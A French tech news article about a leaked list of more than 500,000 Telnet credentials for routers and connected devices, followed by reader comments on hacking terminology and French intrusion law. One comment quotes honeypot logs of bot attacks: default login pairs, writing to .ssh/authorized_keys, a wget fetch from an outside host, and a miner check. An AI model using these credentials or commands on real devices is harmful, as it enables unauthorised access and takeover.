Connexion
Abonnez-vous

Les identifiants de plus de 500 000 routeurs, serveurs et objets connectés publiés sur un forum

Les identifiants de plus de 500 000 routeurs, serveurs et objets connectés publiés sur un forum

Le 22 janvier 2020 à 09h33

La liste contient l’adresse IP, le nom d’utilisateur et le mot de passe pour se connecter à distance via Telnet, comme le rapporte ZDNet.com. Il est ainsi possible de prendre le contrôle de la machine à distance. 

Nos confrères ont pu s’entretenir avec le pirate, qui leur explique que cette base a été construite en « scannant » le Net à la recherche de machines répondant à une demande de connexion Telnet (généralement sur le port 23). Il a ensuite essayé des identifiants par défaut ou des combinaisons faciles à deviner.

ZDNet.com n’a par contre pas tenté de se connecter directement aux machines de la liste, « car cela serait illégal ». Impossible donc d’estimer quel pourcentage d'identifiants était encore valable.

Le pirate explique à nos confrères qu’il a décidé de publier cette liste car il a changé son « business model ». Il propose des services de DDoS à la demande et, plutôt que s’appuyer sur des bots, il est passé à « un nouveau modèle reposant sur la location de serveurs auprès de fournisseurs de services cloud ».

ZDNet.com indique enfin avoir partagé cette liste avec des chercheurs en cybersécurité qui se sont portés volontaire pour contacter les propriétaires des machines concernées. 

 

Le 22 janvier 2020 à 09h33

Commentaires (20)

Vous devez être abonné pour pouvoir commenter.

Abonnez-vous
votre avatar

“Le pirate”, est-ce-que scanner le port telnet sur  des routeurs au pif, s’y connecter et essayer les identifiants par défaut, c’est du hack?



J’imagine que oui, mais c’est vraiment très très léger…

votre avatar

S’il y en a 500 000, c’est pas Madame Michue qui peut le faire. Ça demande à mettre en place une infrastructure pour scanner … “tous les IPs”.

votre avatar

Oui

Article 323-1 du code pénal: Le fait d’accéder ou de se maintenir, frauduleusement, dans tout ou partie d’un système de traitement automatisé de données est puni de deux ans d’emprisonnement et de 30000 euros d’amende.

La difficulté technique de l’intrusion n’influe pas sur la légalité de l’acte.

votre avatar

Je parlais pas de ça, plutôt du terme “pirate”.

 

votre avatar

je crois que la Justice avait répondu à une question un peu subsidiaire, mais qui donne une bonne indication sur où pencherait la balance en cas de procès : voir le cas Bluetouff, où il avait obtenu des fichiers disponibles de façon triviale, mais hébergés dans un endroit où il était “évident” qu’il n’avait pas à être.

votre avatar

Je check.



Merci. <img data-src=" />





Après je sais que quand j’avais eu des cours sur la sécurité informatique, on ne pouvait pas accéder à un système informatique même si celui-ci était ouvert sur le net et sans mot de passe, on avait trouvé une université je crois.

votre avatar

Ou utiliser ZMap sur un serveur loué pour l’occasion afin de profiter d’une connection largement meilleur que celle à la maison pour boucler le tout en 1h ou 2 ?

votre avatar

C’est comme les recettes de cuisines c’est dans les vieux pots que l’on fait les meilleures soupes…..



une prise de contrôle via telnet, simple, efficace et qui peut faire bcp plus mal vu qu’on attaque le réseau dans sa globalité, les routages de inter Vlans etc… SI c’est sur un cœur réseau yesssssssssss.



Après cela montre qu’il y a encore beaucoup de chemin à parcourir en sécurité dans les entreprises et chez les particuliers. Je serai curieux de savoir si il y a de grosses structures, autant une PMe je peux comprendre, mais chez les gros il y a des ressources tech en SI, en sécurité, des contrats de maintenance, des audits. :)

votre avatar

Il existe déjà des moteurs de recherche qui peuvent pas mal aider pour cibler les IPs a tester

https://www.shodan.io/search?query=telnet

votre avatar







dylem29 a écrit :



“Le pirate”, est-ce-que scanner le port telnet sur&nbsp; des routeurs au pif, s’y connecter et essayer les identifiants par défaut, c’est du hack? …





Vu qu’il en fait commerce, j’aurais plutôt parlé de piratage. L’intention malveillante me parait évidente.


votre avatar

meuuuh non, c’est pour la recherche (comme la chasse à la baleine des Japonais)

votre avatar

Dans le lot, il doit y avoir mon pot de miel (“honeypot”, en anglosaxonien) à la maison puisqu’il répond en telnet (port 23) et SSH (port 22) et accepte tous les logins / mots de passe essayés (souvent root/admin), puis enregistre les commandes tapées (de uname à wget). Bref, une telle base constituée automatiquement va comporter un certain nombre de faux positifs.



&nbsp;PS : Shodan fournit déjà la liste des machines qui répondent en telnet.

votre avatar

Magnifique Stéphane, je pense que je vais me monter ça aussi&nbsp;<img data-src=" />



(et merci pour ton blog)

votre avatar

Pour moi le hack c’est quelque chose de difficile à faire techniquement, pas nécessairement illégal.

Le piratage est illégal, mais pas forcément difficile techniquement.


votre avatar







mufast a écrit :



autant une PMe je peux comprendre, mais chez les gros il y a des ressources tech en SI, en sécurité, des contrats de maintenance, des audits. :)





Tu serais étonné, les cascades de sous traitances, avec très peu de compétences sécu puisque ce n’est pas ce qu’on leur demande, entraînent souvent des surfaces d’attaque importantes.



Et c’est incompréhensible aussi pour une PME au passage, ce n’est pas parce qu’une structure est petite qu’elle a le droit de bosser comme de la merde…

“Ah oui votre carrelage est posé en cuvette, mais comprenez je suis en entreprise individuelle et tirer des chapes ce n’est pas mon coeur de métier, le jointoiement est parfait notez bien” <img data-src=" />


votre avatar

Vérifie si son NAS a le port 23 d’ouvert…



A priori, je n’ai pas le 23 d’ouvert, le pare-feu de mon Syno est activé et je n’ai d’ouvert que les ports pour les services qui m’intéressent (NFS et Cloud par exemple).



J’ai quand même mis en fonction la notification du pare-feu au cas où. Si j’ai des alertes là-dessus, je verrais bien.

votre avatar

C’est très rigolo de regarder ce que tapent les bots. Ce matin :

&nbsp;

root / root@1234 et admin / 123456 -&gt; écriture dans .ssh/authorized_keys

&nbsp;

admin / admin -&gt;&nbsp; wgethttp://parabellum.ddnsgeek.com<img data-src=" />08…

&nbsp;

root / root -&gt;

ps -ef | grep ‘[Mm]iner’

votre avatar







yvan a écrit :



Pour moi le hack c’est quelque chose de difficile à faire techniquement, pas nécessairement illégal.

Le piratage est illégal, mais pas forcément difficile techniquement.





J’ai tendance à traduire “hack” par “bidouillage”. Le hack n’est pas forcément quelque chose de difficile ni d’illégal. Derrière le terme il y a 2 idées :




  • l’analyse (bien souvent sans document officiel) d’un système/objet

  • le détournement de certains composants de leur fonction originale.



    Le hack n’est donc pas forcément logiciel.



    Après, par extension, le hack est souvent utiliser pour décrire la la recherche d’une méthode et la méthode elle même de détourner un système de sécurité en informatique.



    Le hacker va désigner avant tout celui qui va trouver cette méthode. L’exploitation est assez secondaire même si par extension (sous sa définition populaire) on désigne par hacker aussi les personnes qui exploitent. L’exploitation va être plus le fruit des cracker/pirate (black hat aussi) pour désigner l’exploitation à des fins “mauvaise”.


votre avatar

Y a encore des gens qui utilisent Telnet Oo’ ?

votre avatar

SSH c’est 2006, il faut laisser aux fournisseurs de matériel le temps de se mettre à jour <img data-src=" />

Les identifiants de plus de 500 000 routeurs, serveurs et objets connectés publiés sur un forum

Fermer